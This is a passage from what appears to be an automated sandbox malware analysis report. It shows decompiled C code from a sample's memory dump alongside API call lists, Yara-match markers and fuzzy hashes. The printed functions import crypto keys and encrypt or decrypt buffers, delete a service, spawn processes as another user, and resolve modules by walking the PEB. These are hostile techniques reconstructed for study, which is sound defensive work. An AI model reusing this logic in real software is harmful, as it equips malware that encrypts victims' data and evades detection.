                  				_t21 = _v524;
                  				_t12 =  &_v524;
                  				if(_t21 != 0) {
                  					_t25 = _t21 & 0x0000ffff;
                  					do {
                  						if(_t25 == 0x5c) {
                  							_t27 =  &(_t12[1]);
                  						}
                  						_t12 =  &(_t12[1]);
                  						_t25 =  *_t12 & 0x0000ffff;
                  					} while (_t25 != 0);
                  				}
                  				_t15 =  &(( &_v524)[lstrlenW( &_v524)]);
                  				while(_t15 >=  &_v524) {
                  					if( *_t15 == 0x2e) {
                  						_t26 = _t15;
                  					} else {
                  						_t15 = _t15 - 2;
                  						continue;
                  					}
                  					L11:
                  					if(_t27 != 0) {
                  						if(_t26 != 0) {
                  							 *_t26 = 0;
                  						}
                  						_t15 =  *_t27 & 0x0000ffff;
                  						_t24 = _t27;
                  						while(_t15 != 0) {
                  							if(_t15 >= 0x30 && _t15 <= 0x39) {
                  								_t24 =  &(_t24[1]);
                  								_t15 =  *_t24 & 0x0000ffff;
                  								continue;
                  							}
                  							goto L21;
                  						}
                  						_t15 = OpenServiceW(_t19, _t27, 0x10000);
                  						_t28 = _t15;
                  						if(_t28 != 0) {
                  							DeleteService(_t28);
                  							return CloseServiceHandle(_t28);
                  						}
                  					}
                  					L21:
                  					return _t15;
                  				}
                  				goto L11;
                  			}














                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0040F6EF
                  • lstrlenW.KERNEL32(?), ref: 0040F725
                  • OpenServiceW.ADVAPI32(00000000,00000000,00010000), ref: 0040F77F
                  • DeleteService.ADVAPI32(00000000), ref: 0040F78C
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F793
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseDeleteFileHandleModuleNameOpenlstrlen
                  • String ID:
                  • API String ID: 1755434187-0
                  • Opcode ID: 8c6d03efe9b830c4f1bfd9f60f006d060f3a7d378c1f73d65c75a4cd1f519f25
                  • Instruction ID: 98483c91935e4ebaa86b3809d2fb255be3bc53819a93f085276952b5965563ee
                  • Opcode Fuzzy Hash: 8c6d03efe9b830c4f1bfd9f60f006d060f3a7d378c1f73d65c75a4cd1f519f25
                  • Instruction Fuzzy Hash: F4212B754012259ACB309F248C48AF77778DF44B56F40017BE985F7A90EB389E8AC79E
                  Uniqueness

                  Uniqueness Score: 1.01%

                  APIs
                    • Part of subcall function 00401F75: CryptAcquireContextW.ADVAPI32(00416510,00000000,00000000,00000018,F0000040,00000000,00000102,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401F8E
                    • Part of subcall function 00401F75: CryptImportKey.ADVAPI32(0040F111,?,00000000,00000000,00416514,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401FD1
                    • Part of subcall function 00401F75: LocalFree.KERNEL32(0040F111,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FDC
                    • Part of subcall function 00401F75: CryptReleaseContext.ADVAPI32(00000000,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FED
                  • CryptGenKey.ADVAPI32(0000660E,00000001,00416518,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402026
                  • CryptCreateHash.ADVAPI32(00008004,00000000,00000000,0041651C,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402044
                  • CryptDestroyKey.ADVAPI32(?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402058
                  • CryptDestroyKey.ADVAPI32(?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402064
                  • CryptReleaseContext.ADVAPI32(00000000,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402072
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$DestroyRelease$AcquireCreateFreeHashImportLocal
                  • String ID:
                  • API String ID: 4169801620-0
                  • Opcode ID: c10922a28de3b132bd60650c9f4fd97f46447a34fe901632b894f30011ec60e5
                  • Instruction ID: b801e2a3a967f12315dba04296e97bd271bf4fd4bc32c7350b1888b7b3c01b6c
                  • Opcode Fuzzy Hash: c10922a28de3b132bd60650c9f4fd97f46447a34fe901632b894f30011ec60e5
                  • Instruction Fuzzy Hash: B7F0BD703942057AEA212B31FD0AF963A63BB4470AF158435B611E40F8DFA6D651DE1C
                  Uniqueness

                  Uniqueness Score: 0.19%

                  C-Code - Quality: 28%
                  			E0040215A(void* __ecx, intOrPtr* __edx, BYTE** _a4) {
                  				long* _v8;
                  				intOrPtr* _v12;
                  				intOrPtr _t17;
                  				void* _t20;
                  				BYTE* _t21;
                  				void* _t33;
                  				BYTE** _t35;
                  				void* _t51;
                  				BYTE* _t54;
                  				DWORD* _t56;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_v12 = __edx;
                  				_t17 =  *((intOrPtr*)(__edx + 4));
                  				_t51 = 0;
                  				_t54 = _t17 - 0x74;
                  				if(_t17 >= 0x74) {
                  					_t19 =  !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54;
                  					__eflags = _t54 - ( !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54);
                  					if(_t54 != ( !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54)) {
                  						goto L1;
                  					} else {
                  						_t35 = _a4;
                  						_t35[1] = _t54;
                  						_t21 = E004014F2(_t54);
                  						 *_t35 = _t21;
                  						if(_t21 != 0) {
                  							_v12 =  *_v12;
                  							_push( &_v8);
                  							_push(0);
                  							_push(0);
                  							_push( *0x41651c);
                  							if( *0x4133b4() == 0) {
                  								_t15 =  &(_t35[1]); // 0x406220
                  								_t56 = _t15;
                  								goto L10;
                  							} else {
                  								E0040151F( *_t35, _v12 + 0x74, _t54);
                  								_t10 =  &(_t35[1]); // 0x406220
                  								_t56 = _t10;
                  								if(CryptDecrypt( *0x416518, _v8, 1, 0,  *_t35, _t56) != 0) {
                  									 *0x412f04(_v8, _v12, 0x60,  *0x416514, 0, 0);
                  									_t33 = 1;
                  									_t51 =  !=  ? _t33 : 0;
                  								}
                  								 *0x413608(_v8);
                  								if(_t51 == 0) {
                  									L10:
                  									E00401532( *_t35);
                  									 *_t35 =  *_t35 & 0x00000000;
                  									 *_t56 =  *_t56 & 0x00000000;
                  								}
                  							}
                  						}
                  						_t20 = _t51;
                  					}
                  				} else {
                  					L1:
                  					_t20 = 0;
                  				}
                  				return _t20;
                  			}














                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,0040C894,00000104,0040C6FC,00000000,?,?,?,0040621C,0040C894), ref: 004021BE
                  • CryptDecrypt.ADVAPI32(0040C894,00000001,00000000,0040621C,00406220,?,?,?,0040621C,0040C894), ref: 004021EC
                  • CryptVerifySignatureW.ADVAPI32(0040C894,0040621C,00000060,00000000,00000000,?,?,?,0040621C,0040C894), ref: 00402208
                  • CryptDestroyHash.ADVAPI32(0040C894,?,?,?,0040621C,0040C894), ref: 00402219
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DecryptDestroyDuplicateSignatureVerify
                  • String ID:
                  • API String ID: 1014757615-0
                  • Opcode ID: 09569594b61da52c59d40f425788a8422af23cb8887ee059169b09b77780c7a0
                  • Instruction ID: 04f31bdf2388faa97c57a2fd3933937c900cc02f324019b7ba81707c3369ae23
                  • Opcode Fuzzy Hash: 09569594b61da52c59d40f425788a8422af23cb8887ee059169b09b77780c7a0
                  • Instruction Fuzzy Hash: A3318C31700110BFDB118F64DD44BAA7BBAEF88711F1040AAF901EB2E4DBB1AE019A59
                  Uniqueness

                  Uniqueness Score: 0.53%

                  APIs
                  • CryptAcquireContextW.ADVAPI32(00416510,00000000,00000000,00000018,F0000040,00000000,00000102,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401F8E
                  • CryptImportKey.ADVAPI32(0040F111,?,00000000,00000000,00416514,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401FD1
                  • LocalFree.KERNEL32(0040F111,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FDC
                  • CryptReleaseContext.ADVAPI32(00000000,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FED
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$AcquireFreeImportLocalRelease
                  • String ID:
                  • API String ID: 3512700226-0
                  • Opcode ID: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction ID: 48002f7dd24f67e1fb8acd982fa0323bbb62263b5e85e9a59621982e2ad0c162
                  • Opcode Fuzzy Hash: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction Fuzzy Hash: 31018F31740244BBDB315BA2EC09FDB7E7DFB85B01F004179B604E21A0DBB19A10DBA8
                  Uniqueness

                  Uniqueness Score: 0.17%

                  C-Code - Quality: 44%
                  			E00401D2B(WCHAR* __edx, void* _a8, struct _PROCESS_INFORMATION* _a12) {
                  				WCHAR* _v8;
                  				struct _STARTUPINFOW _v76;
                  				intOrPtr _t19;
                  				int _t24;
                  				long _t33;
                  				void* _t34;
                  				int _t35;
                  
                  				_t33 = 0x44;
                  				_t35 = 0;
                  				_v8 = 0;
                  				E00401503( &_v76, _t33);
                  				_v76.cb = _t33;
                  				_t34 = _a8;
                  				if(_t34 == 0) {
                  					_t35 = CreateProcessW(0, __edx, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a12);
                  				} else {
                  					_t19 = E00401A52(0x412090, 0xdb2fc54);
                  					_push(0);
                  					_v76.lpDesktop = _t19;
                  					_push(_t34);
                  					_push( &_v8);
                  					if( *0x4154a0() != 0) {
                  						_t24 = CreateProcessAsUserW(_t34, 0, __edx, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a12);
                  						_t35 = _t24;
                  						 *0x415564(_v8);
                  					}
                  					L00401B09(_v76.lpDesktop);
                  				}
                  				return _t35;
                  			}











                  APIs
                  • CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,0040FBF6), ref: 00401D8A
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,0040FBF6), ref: 00401DBA
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateProcess$User
                  • String ID: M vu
                  • API String ID: 4042571897-696074975
                  • Opcode ID: e3f8796ccff0070e9350f972b6a419064f6187467af522590b0749c7ed7297d7
                  • Instruction ID: 8fb0d45fc8d51ab0f5bd0c7e4b9a4df30b4027125393a8a12e18b04e3b77fe86
                  • Opcode Fuzzy Hash: e3f8796ccff0070e9350f972b6a419064f6187467af522590b0749c7ed7297d7
                  • Instruction Fuzzy Hash: 64115E71A01228BBCB219B968C48DDFBFBDEF85764B144027F609A3250D6745D02C7A4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 21%
                  			E0040207B(intOrPtr* __edx, signed int* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr* _v12;
                  				char _v16;
                  				signed int _v20;
                  				char _t26;
                  				signed int _t27;
                  				void* _t39;
                  				void* _t41;
                  				signed int _t42;
                  				intOrPtr _t49;
                  				intOrPtr _t56;
                  				signed int* _t58;
                  				void* _t59;
                  
                  				_v12 = __edx;
                  				_t26 =  *((intOrPtr*)(__edx + 4));
                  				_t42 = _t26 + 1;
                  				if((_t42 & 0x0000000f) != 0) {
                  					_t42 = (_t42 & 0xfffffff0) + 0x10;
                  				}
                  				_t58 = _a4;
                  				_v16 = _t26;
                  				_t59 = 0;
                  				_t58[1] = _t42 + 0x74;
                  				_t27 = E004014F2(_t42 + 0x74);
                  				_v20 = _t27;
                  				 *_t58 = _t27;
                  				if(_t27 == 0) {
                  					L9:
                  					return _t59;
                  				} else {
                  					_v8 = _t27 + 0x74;
                  					_push( &_a4);
                  					_push(0);
                  					_push(0);
                  					_push( *0x41651c);
                  					if( *0x4133b4() == 0) {
                  						L8:
                  						E00401532( *_t58);
                  						 *_t58 =  *_t58 & 0x00000000;
                  						_t58[1] = _t58[1] & 0x00000000;
                  						goto L9;
                  					}
                  					E0040151F(_v8,  *_v12,  *((intOrPtr*)(_v12 + 4)));
                  					_push(_t42);
                  					_push( &_v16);
                  					_push(_v8);
                  					_push(0);
                  					_push(1);
                  					_push(_a4);
                  					_push( *0x416518);
                  					if( *0x413124() != 0) {
                  						_t43 = _v20;
                  						_t56 =  *0x416518; // 0x0
                  						_t49 =  *0x416514; // 0x0
                  						_t39 = E00401F11(_t49, _t56, _v20);
                  						_pop(_t50);
                  						if(_t39 != 0) {
                  							E00401F56(_a4, _t43 + 0x60);
                  							_t41 = 1;
                  							_t59 =  !=  ? _t41 : 0;
                  						}
                  					}
                  					 *0x413608(_a4);
                  					if(_t59 != 0) {
                  						goto L9;
                  					} else {
                  						goto L8;
                  					}
                  				}
                  			}

















                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,00000000,0040C6FC,00000000,00000104,0040616B,?,00000000,000CD140), ref: 004020CC
                  • CryptEncrypt.ADVAPI32(?,00000001,00000000,?,?,?), ref: 004020FD
                  • CryptDestroyHash.ADVAPI32(?), ref: 00402139
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DestroyDuplicateEncrypt
                  • String ID:
                  • API String ID: 1128268866-0
                  • Opcode ID: 4e59cee7960c38e8b5ee7e5856dafefdb3e81cdfc3becf9d1b757b82fba9955f
                  • Instruction ID: e215d4e7104d4b47444e5095201a7053bbba18aa046f11bf0f453833bd48b0d0
                  • Opcode Fuzzy Hash: 4e59cee7960c38e8b5ee7e5856dafefdb3e81cdfc3becf9d1b757b82fba9955f
                  • Instruction Fuzzy Hash: 3E21A271A00206BFDB10DF64DD44AAABBB9FF04354B10817AE905DB2A1EB74DE40CB94
                  Uniqueness

                  Uniqueness Score: 0.65%

                  APIs
                  • CryptExportKey.ADVAPI32(00000000,00000000,00000001,00000040,?,?,00000000), ref: 00401F2F
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptExport
                  • String ID: l
                  • API String ID: 3389274496-2517025534
                  • Opcode ID: 3ca03c0b0af9f491b2816fad542ac85e238e487dba8f6d51c2e98b0d322ebe00
                  • Instruction ID: 8de1b0b566f387a962e970ad356d4eae64fe2c0c17b5e81973823825b819e613
                  • Opcode Fuzzy Hash: 3ca03c0b0af9f491b2816fad542ac85e238e487dba8f6d51c2e98b0d322ebe00
                  • Instruction Fuzzy Hash: 83F02730900218ABDB10DF64CC44EFEBBBDDB05B44F1001AAED05E7280E6709E0487E4
                  Uniqueness

                  Uniqueness Score: 0.02%

                  APIs
                  • CryptGetHashParam.ADVAPI32(?,00000002,?,00000000), ref: 00401F6B
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptHashParam
                  • String ID:
                  • API String ID: 1839025277-0
                  • Opcode ID: 496b6ce24351a1596fbace5237037a10789b3b74501e142722ab8e206ca54b84
                  • Instruction ID: ea0d1c88b8beea22a5d58a2278bf81109cad106d3917202b53e93bae8ff64b58
                  • Opcode Fuzzy Hash: 496b6ce24351a1596fbace5237037a10789b3b74501e142722ab8e206ca54b84
                  • Instruction Fuzzy Hash: BAC012B055020CBFE614CB40DD0AFBAB7ACD744B05F404198BD0462281E6B15E0055B1
                  Uniqueness

                  Uniqueness Score: 0.02%

                  C-Code - Quality: 100%
                  			E0040436D(intOrPtr* __ecx) {
                  				char _v5;
                  				intOrPtr _v12;
                  				intOrPtr* _v16;
                  				signed int _v20;
                  				intOrPtr _v24;
                  				signed int _v28;
                  				char _v32;
                  				signed int _v36;
                  				intOrPtr _t155;
                  				signed int _t161;
                  				void* _t167;
                  				signed int _t178;
                  				void* _t189;
                  				signed int _t192;
                  				signed int _t203;
                  				signed char _t213;
                  				signed int _t217;
                  				signed char _t219;
                  				signed int _t220;
                  				intOrPtr _t224;
                  				intOrPtr _t226;
                  				signed int _t228;
                  				signed int _t231;
                  				intOrPtr _t234;
                  				void* _t236;
                  				intOrPtr* _t240;
                  				intOrPtr _t243;
                  				intOrPtr _t244;
                  				signed int _t250;
                  				intOrPtr* _t253;
                  				intOrPtr* _t257;
                  				intOrPtr _t258;
                  				signed int _t260;
                  				signed int _t264;
                  				signed int _t267;
                  				intOrPtr* _t274;
                  				intOrPtr _t275;
                  				void* _t276;
                  				signed int _t277;
                  				signed int _t279;
                  				signed int _t281;
                  				void* _t283;
                  
                  				_t274 = __ecx;
                  				_t257 =  *((intOrPtr*)(__ecx + 0x84));
                  				_t275 =  *((intOrPtr*)(__ecx + 0x88));
                  				_t155 =  *((intOrPtr*)(__ecx + 0x80));
                  				_v16 = _t257;
                  				_v12 = _t275;
                  				_v24 = _t155;
                  				L2:
                  				while(_t275 != 0 || _t155 != 0 &&  *((intOrPtr*)(_t274 + 0x20)) != _t275) {
                  					_t224 =  *((intOrPtr*)(_t274 + 0x20));
                  					if( *((intOrPtr*)(_t274 + 0x24)) + _t224 < 2) {
                  						while(_t275 != 0) {
                  							if( *((intOrPtr*)(_t274 + 0x20)) >= 0x102) {
                  								L12:
                  								_t258 =  *((intOrPtr*)(_t274 + 0x20));
                  								_t226 =  <  ? 0x8000 - _t258 :  *((intOrPtr*)(_t274 + 0x24));
                  								 *((intOrPtr*)(_t274 + 0x24)) = _t226;
                  								if(_v24 != 0 || _t258 >= 0x102) {
                  									_t217 = 0;
                  									_t276 = 2;
                  									_t277 =  !=  ?  *(_t274 + 0x50) : _t276;
                  									_t161 =  *(_t274 + 0x1c) & 0x00007fff;
                  									_v28 = 1;
                  									_v32 = 0;
                  									_v36 = _t277;
                  									_v20 = _t161;
                  									if(( *(_t274 + 8) & 0x00090000) == 0) {
                  										E00403C52( &_v32, _t274,  *(_t274 + 0x1c), _t226, _t258,  &_v32,  &_v36);
                  										_t217 = _v32;
                  										_t283 = _t283 + 0x10;
                  										_t277 = _v36;
                  										_t228 = _v20;
                  										L32:
                  										if(_t277 != 3 || _t217 < 0x2000) {
                  											L34:
                  											if(_t228 == _t217 || ( *(_t274 + 8) & 0x00020000) != 0 && _t277 <= 5) {
                  												goto L37;
                  											} else {
                  												goto L38;
                  											}
                  										} else {
                  											L37:
                  											_t277 = 0;
                  											_t217 = 0;
                  											L38:
                  											_t260 =  *(_t274 + 0x50);
                  											if(_t260 == 0) {
                  												if(_t217 != 0) {
                  													if( *((intOrPtr*)(_t274 + 0x14)) != 0 || ( *(_t274 + 8) & 0x00010000) != 0 || _t277 >= 0x80) {
                  														E004042D4(_t274, _t277, _t217);
                  														L53:
                  														_t231 = _t277;
                  														goto L54;
                  													} else {
                  														_t178 =  <  ? _t228 : 0x8100;
                  														L51:
                  														 *(_t274 + 0x54) =  *(_t178 + _t274 + 0x90) & 0x000000ff;
                  														 *((intOrPtr*)(_t274 + 0x4c)) = _t217;
                  														 *(_t274 + 0x50) = _t277;
                  														L46:
                  														_t231 = _v28;
                  														L54:
                  														 *(_t274 + 0x1c) =  *(_t274 + 0x1c) + _t231;
                  														 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) - _t231;
                  														_t167 =  *((intOrPtr*)(_t274 + 0x24)) + _t231;
                  														_t233 =  <  ? _t167 : 0x8000;
                  														 *((intOrPtr*)(_t274 + 0x24)) =  <  ? _t167 : 0x8000;
                  														_t234 =  *((intOrPtr*)(_t274 + 0x28));
                  														if(_t234 > _t274 + 0x1926a) {
                  															L58:
                  															_t275 = _v12;
                  															 *((intOrPtr*)(_t274 + 0x84)) = _v16;
                  															 *((intOrPtr*)(_t274 + 0x88)) = _t275;
                  															_t236 = E004037A9(_t274, 0);
                  															if(_t236 != 0) {
                  																return 0 | _t236 > 0x00000000;
                  															}
                  															_t155 = _v24;
                  															L1:
                  															_t257 = _v16;
                  															goto L2;
                  														}
                  														_t275 = _v12;
                  														_t155 = _v24;
                  														if( *((intOrPtr*)(_t274 + 0x3c)) <= 0x7c00) {
                  															goto L1;
                  														}
                  														if((_t234 - _t274 - 0x9272) * 0x73 >> 7 >=  *((intOrPtr*)(_t274 + 0x3c))) {
                  															goto L58;
                  														}
                  														_t155 = _v24;
                  														if(( *(_t274 + 8) & 0x00080000) == 0) {
                  															goto L1;
                  														}
                  														goto L58;
                  													}
                  												}
                  												_t181 =  <  ? _t228 : 0x8100;
                  												E004042A2(_t274,  *((intOrPtr*)(( <  ? _t228 : 0x8100) + _t274 + 0x90)));
                  												goto L46;
                  											}
                  											_t240 = _t274;
                  											if(_t277 <= _t260) {
                  												E004042D4(_t240, _t260,  *((intOrPtr*)(_t274 + 0x4c)));
                  												_t231 =  *(_t274 + 0x50) - 1;
                  												 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
                  												goto L54;
                  											}
                  											E004042A2(_t240,  *(_t274 + 0x54));
                  											if(_t277 < 0x80) {
                  												_t178 = _v20;
                  												goto L51;
                  											}
                  											E004042D4(_t240, _t277, _t217);
                  											 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
                  											goto L53;
                  										}
                  									}
                  									_t228 = _t161;
                  									if(_t226 != 0 && ( *(_t274 + 8) & 0x00080000) == 0) {
                  										_t277 = 0;
                  										_v5 =  *((intOrPtr*)((_t228 - 0x00000001 & 0x00007fff) + _t274 + 0x90));
                  										if(_t258 == 0) {
                  											L30:
                  											_t277 = 0;
                  											goto L34;
                  										}
                  										_t189 = _t228 + _t274;
                  										_t243 = _v5;
                  										while( *((intOrPtr*)(_t189 + _t277 + 0x90)) == _t243) {
                  											_t277 = _t277 + 1;
                  											if(_t277 < _t258) {
                  												continue;
                  											}
                  											break;
                  										}
                  										_t228 = _v20;
                  										if(_t277 < 3) {
                  											goto L30;
                  										}
                  										_t217 = 1;
                  									}
                  									goto L32;
                  								} else {
                  									_t257 = _v16;
                  									goto L61;
                  								}
                  							}
                  							_t219 =  *_t257;
                  							_t192 =  *(_t274 + 0x1c) +  *((intOrPtr*)(_t274 + 0x20)) & 0x00007fff;
                  							_t257 = _t257 + 1;
                  							_t275 = _t275 - 1;
                  							_v16 = _t257;
                  							_v12 = _t275;
                  							 *(_t192 + _t274 + 0x90) = _t219;
                  							if(_t192 < 0x101) {
                  								 *(_t192 + _t274 + 0x8090) = _t219;
                  							}
                  							 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) + 1;
                  							_t244 =  *((intOrPtr*)(_t274 + 0x20));
                  							if( *((intOrPtr*)(_t274 + 0x24)) + _t244 >= 3) {
                  								_t279 =  *(_t274 + 0x1c) + _t244 + 0xfffffffd;
                  								_t264 = _t279 & 0x00007fff;
                  								_t250 = (( *(_t264 + _t274 + 0x90) & 0x000000ff) << 0x0000000a ^ _t219 & 0x000000ff) & 0x00007fff ^ ( *((_t279 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0xff) << 0x00000005;
                  								 *((short*)(_t274 + 0x19272 + _t264 * 2)) =  *(_t274 + 0x29272 + _t250 * 2);
                  								_t257 = _v16;
                  								 *(_t274 + 0x29272 + _t250 * 2) = _t279;
                  								_t275 = _v12;
                  							}
                  						}
                  						goto L12;
                  					}
                  					_t203 =  *(_t274 + 0x1c) + _t224;
                  					_t281 = _t203 & 0x00007fff;
                  					_t220 = _t203 - 2;
                  					_t267 = ( *((_t220 & 0x00007fff) + _t274 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t220 + 0x00000001 & 0x00007fff) + _t274 + 0x90) & 0x000000ff;
                  					_t211 =  <  ? _v12 : 0x102 - _t224;
                  					_v12 = _v12 - 0x102;
                  					_t212 = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
                  					_v28 = _v16 + 0x102;
                  					 *((intOrPtr*)(_t274 + 0x20)) = ( <  ? _v12 : 0x102 - _t224) +  *((intOrPtr*)(_t274 + 0x20));
                  					while(1) {
                  						_t253 = _v16;
                  						if(_t253 == _v28) {
                  							break;
                  						}
                  						_t213 =  *_t253;
                  						_v16 = _t253 + 1;
                  						 *(_t274 + _t281 + 0x90) = _t213;
                  						if(_t281 < 0x101) {
                  							 *(_t281 + _t274 + 0x8090) = _t213;
                  						}
                  						_t267 = (_t267 << 0x00000005 ^ _t213 & 0x000000ff) & 0x00007fff;
                  						_t281 = _t281 + 0x00000001 & 0x00007fff;
                  						 *((short*)(_t274 + 0x19272 + (_t220 & 0x00007fff) * 2)) =  *(_t274 + 0x29272 + _t267 * 2);
                  						 *(_t274 + 0x29272 + _t267 * 2) = _t220;
                  						_t220 = _t220 + 1;
                  					}
                  					_t275 = _v12;
                  					goto L12;
                  				}
                  				L61:
                  				 *((intOrPtr*)(_t274 + 0x84)) = _t257;
                  				 *((intOrPtr*)(_t274 + 0x88)) = _t275;
                  				return 1;
                  			}














































                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
                  • Instruction ID: e33084252fcec48e949ebcca89b2b69e4ca8ec5097f1102ae8c543975fbc8947
                  • Opcode Fuzzy Hash: ae03f3a372626642b1fb26106d35d9b0dbeac125857d4feb9d457580f34e28b3
                  • Instruction Fuzzy Hash: 4FC1C271B04916ABCB18CE68C4907BAF7F1BF89304F04427ED659A7781D73CA855CB88
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 100%
                  			E004012CD(void* __ecx) {
                  				void* _t8;
                  				intOrPtr* _t12;
                  				intOrPtr* _t13;
                  
                  				_t8 = __ecx;
                  				_t12 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
                  				_t13 =  *_t12;
                  				while(_t13 != _t12) {
                  					if(E00401161( *((intOrPtr*)(_t13 + 0x30))) == _t8) {
                  						return  *((intOrPtr*)(_t13 + 0x18));
                  					}
                  					_t13 =  *_t13;
                  				}
                  				return 0;
                  			}







                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction ID: 7ecbe99e9aff7bbd4a6860067150bf6fe1a6c3b143e7c3a6fabfcc45b8fe1074
                  • Opcode Fuzzy Hash: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction Fuzzy Hash: EFE086333104508BC720DA99C480857F3F9EB84370B2908BFE546F7A61C338BC019688
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 100%
                  			E00401E04() {
                  
                  				return  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                  			}




                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 83%
                  			E00408CD5(void* __eflags) {
